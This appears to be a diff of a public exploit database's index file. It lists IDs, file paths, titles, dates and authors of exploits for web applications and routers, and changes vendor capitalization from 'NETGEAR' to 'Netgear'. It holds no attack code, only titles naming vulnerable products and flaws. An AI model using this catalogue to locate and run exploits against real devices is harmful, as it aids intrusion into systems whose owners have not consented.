24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",webapps,php,
24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple,
24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware,
24916,exploits/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware,
24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",webapps,hardware,
24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,webapps,hardware,
24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,webapps,php,
@ -30292,12 +30293,12 @@ id,file,description,date,author,type,platform,port
25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",webapps,php,
25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,webapps,asp,
25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,
25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware,
25969,exploits/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware,
25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php,
25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,webapps,php,
25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,hardware,
25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,jsp,
25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80
25978,exploits/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80
25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",webapps,asp,
25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm,
25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm,
@ -31679,7 +31680,7 @@ id,file,description,date,author,type,platform,port
27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,webapps,php,
27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,webapps,php,
27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",webapps,php,
27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware,
27774,exploits/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware,
27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,webapps,linux,443
27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",webapps,windows,
27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php,
@ -33577,7 +33578,7 @@ id,file,description,date,author,type,platform,port
32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,webapps,asp,
32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,webapps,php,
32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",webapps,php,
33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware,
33984,exploits/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware,
30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,webapps,php,
30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,webapps,php,
30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi,
@ -34241,7 +34242,7 @@ id,file,description,date,author,type,platform,port
31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php,
31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,webapps,php,
31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php,
31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware,
31617,exploits/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware,
31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,webapps,ios,
31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,webapps,java,
31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,webapps,php,
@ -35020,7 +35021,7 @@ id,file,description,date,author,type,platform,port
32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php,
32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,webapps,php,
32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",webapps,asp,
32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080
32883,exploits/hardware/webapps/32883.txt,"Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080
32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",webapps,hardware,8080
32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",webapps,asp,
32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,webapps,php,
@ -35140,7 +35141,7 @@ id,file,description,date,author,type,platform,port
33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,webapps,php,
33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,webapps,hardware,
33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php,
33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware,
33138,exploits/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware,
33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,webapps,php,
33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",webapps,php,
33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",webapps,php,
@ -35668,7 +35669,7 @@ id,file,description,date,author,type,platform,port
34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,webapps,php,
34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",webapps,hardware,80
34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",webapps,php,80
34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware,
34149,exploits/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware,
34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,webapps,php,
34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,
34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple,
@ -36418,7 +36419,7 @@ id,file,description,date,author,type,platform,port
35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",webapps,php,80
35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",webapps,php,
35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",webapps,php,
35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware,
35325,exploits/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware,
35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,
35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php,
35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,webapps,php,
@ -37973,7 +37974,7 @@ id,file,description,date,author,type,platform,port
37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,webapps,php,80
37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80
37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",webapps,php,80
37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware,
37720,exploits/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware,
37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php,
37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",webapps,php,80
37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80
@ -38151,7 +38152,7 @@ id,file,description,date,author,type,platform,port
38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php,
38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php,
38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,webapps,php,
38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80
38097,exploits/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80
38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,webapps,jsp,8081
38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80
38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",webapps,php,
@ -38327,7 +38328,7 @@ id,file,description,date,author,type,platform,port
38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",webapps,php,
38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,webapps,php,
38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",webapps,hardware,
38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware,
38449,exploits/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware,
38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",webapps,php,
38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",webapps,hardware,
38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",webapps,php,
@ -38797,7 +38798,7 @@ id,file,description,date,author,type,platform,port
39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php,
39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,webapps,php,80
39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,webapps,php,80
39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80
39356,exploits/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80
39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,webapps,multiple,
39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,webapps,php,
39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",webapps,php,80
@ -38813,7 +38814,7 @@ id,file,description,date,author,type,platform,port
39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",webapps,php,80
39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",webapps,php,80
39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware,
39412,exploits/hardware/webapps/39412.txt,"Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware,
39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80
39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",webapps,php,80
39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",webapps,php,80
@ -39402,8 +39403,8 @@ id,file,description,date,author,type,platform,port
40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware,
40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php,
40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware,
40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi,
40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware,
40889,exploits/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi,
40898,exploits/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware,
40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware,
40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,
40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,webapps,php,80
@ -39578,7 +39579,7 @@ id,file,description,date,author,type,platform,port
41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php,
41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php,
41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php,
41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware,
41205,exploits/hardware/webapps/41205.py,"Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware,
41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php,
@ -39714,7 +39715,7 @@ id,file,description,date,author,type,platform,port
41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php,
41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",webapps,php,
41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php,
41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware,
41394,exploits/hardware/webapps/41394.py,"Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware,
41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,webapps,windows,
41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,webapps,php,
41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php,
@ -39760,7 +39761,7 @@ id,file,description,date,author,type,platform,port
41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,multiple,
41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,webapps,php,
41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
41459,exploits/hardware/webapps/41459.py,"Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
@ -39769,7 +39770,7 @@ id,file,description,date,author,type,platform,port
41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,
41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",webapps,php,
41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware,
41472,exploits/hardware/webapps/41472.html,"Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware,
41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",webapps,hardware,
41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php,
41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",webapps,xml,
@ -40583,7 +40584,7 @@ id,file,description,date,author,type,platform,port
42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",webapps,php,
42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,webapps,windows,
42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",webapps,php,
42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware,
42956,exploits/hardware/webapps/42956.txt,"Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware,
42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",webapps,php,
42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,
42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,webapps,jsp,
@ -41523,7 +41524,7 @@ id,file,description,date,author,type,platform,port
45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80
45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80
45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
45741,exploits/hardware/webapps/45741.txt,"Netgear WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80
45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80
@ -42116,7 +42117,7 @@ id,file,description,date,author,type,platform,port
47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
47117,exploits/hardware/webapps/47117.txt,"Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
@ -42720,7 +42721,7 @@ id,file,description,date,author,type,platform,port
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,
48454,exploits/linux/webapps/48454.py,"Phase Botnet - Blind SQL Injection",2014-12-23,MalwareTech,webapps,linux,
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,
